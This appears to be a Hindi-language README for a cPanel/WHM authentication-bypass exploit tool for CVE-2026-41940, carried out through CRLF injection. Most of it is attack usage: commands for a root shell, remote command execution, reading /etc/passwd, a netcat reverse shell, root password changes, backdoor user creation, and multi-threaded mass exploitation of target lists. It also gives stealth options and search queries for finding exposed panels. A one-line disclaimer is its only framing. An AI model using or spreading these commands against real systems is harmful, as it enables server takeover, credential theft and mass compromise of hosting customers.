
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - सर्वश्रेष्ठ प्रवाह 💥 CRLF इंजेक्शन से प्रमाणीकरण बाईपास, सत्र अपहरण और खाता लीक होता है। ✅ प्रॉक्सी, कस्टम UA, कीप-अलाइव, पुनःप्रयास, SSL सत्यापन, रंगीन आउटपुट, फ़ाइल सहेजने का समर्थन। ⚡ पेंटेस्टर्स के लिए उन्नत PoC.

cPanel & WHM Edition - CRLF इंजेक्शन से प्रमाणीकरण बायपास और पूर्ण सत्र अपहरण
यह एक्सप्लॉइट CVE-2026-41940 का उपयोग करता है, जो cPanel/WHM में एक गंभीर प्रमाणीकरण बायपास कमजोरी है। सत्र प्रबंधन प्रणाली में एक निर्मित CRLF पेलोड इंजेक्ट करके, यह बिना किसी वैध क्रेडेंशियल के सत्र अपहरण, रूट एक्सेस और होस्टिंग पैनल पर पूर्ण नियंत्रण प्राप्त करता है।
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत पहुंच अवैध है।
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## 🔧 दूरस्थ कमांड निष्पादन
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
मेरे अन्य एक्सप्लॉइट रिपॉजिटरी देखें:
| श्रेणी | विशेषताएं |
|---|
| शोषण | ✅ CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बायपास ✅ WHM सत्र अपहरण ✅ सुरक्षा टोकन रिसाव ✅ तत्काल रूट एक्सेस |
| पोस्ट-शोषण | ✅ खाता सूची निष्कर्षण (उपयोगकर्ता + डोमेन) ✅ दूरस्थ कमांड निष्पादन (RCE) ✅ रिवर्स शेल (netcat संगत) ✅ फ़ाइल पढ़ना (कॉन्फ़िग, लॉग, आदि) ✅ रूट पासवर्ड बदलें ✅ नया cPanel उपयोगकर्ता बनाएं |
| स्कैनिंग | ✅ एकल लक्ष्य शोषण ✅ बहु-लक्ष्य सामूहिक स्कैन ✅ मल्टी-थ्रेडिंग (कॉन्फ़िगरेबल थ्रेड्स) ✅ पोर्ट ओवरराइड समर्थन |
| गुप्तता | ✅ अनुरोधों के बीच यादृच्छिक विलंब ✅ X-Forwarded-For स्पूफिंग ✅ कस्टम User-Agent समर्थन ✅ प्रॉक्सी समर्थन (HTTP/HTTPS) |
| उपयोगिता | ✅ इंटरैक्टिव WHM शेल (-i)✅ रंगीन आउटपुट (colorama) ✅ वर्बोज़/डीबग मोड ✅ फ़ाइल में खाता सूची निर्यात ✅ Keep-Alive सत्र थ्रेड ✅ अस्थिर कनेक्शनों के लिए पुनः प्रयास तंत्र |
| उत्पाद | संस्करण | स्थिति |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ पुष्टि |
| cPanel & WHM | 11.104 - 11.110 | ✅ पुष्टि |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ सीमित |
| cPanel & WHM | < 11.86 | ✅ संभवतः कमजोर |
| छोटा | लंबा | विवरण | डिफ़ॉल्ट |
|---|
-t | --target | एकल लक्ष्य URL | आवश्यक (एकल) |
-l | --target-file | लक्ष्य सूची वाली फ़ाइल | आवश्यक (सामूहिक) |
-p | --port | पोर्ट ओवरराइड करें | स्वतः पता लगाएं |
-o | --output | खाता सूची फ़ाइल में सहेजें | कोई नहीं |
-v | --verbose | डीबग आउटपुट सक्षम करें | गलत |
-i | --interactive | इंटरैक्टिव WHM शेल | गलत |
--proxy | HTTP/HTTPS प्रॉक्सी | कोई नहीं | |
-ua | --user-agent | कस्टम User-Agent | यादृच्छिक |
--cmd | एकल कमांड निष्पादित करें | कोई नहीं | |
--reverse-shell | रिवर्स शेल IP:PORT | कोई नहीं | |
--passwd | रूट पासवर्ड बदलें | कोई नहीं | |
--adduser | नया उपयोगकर्ता बनाएं (USER DOMAIN PASS) | कोई नहीं | |
--read | लक्ष्य से फ़ाइल पढ़ें | कोई नहीं | |
--threads | सामूहिक स्कैन के लिए थ्रेड | 10 | |
--delay | Keep-alive अंतराल (सेकंड) | 3.0 | |
--max-retries | प्रति अनुरोध अधिकतम पुनः प्रयास | 3 | |
--no-keep-alive | सत्र बनाए न रखें | गलत | |
--ssl-verify | SSL प्रमाणपत्र सत्यापित करें | गलत |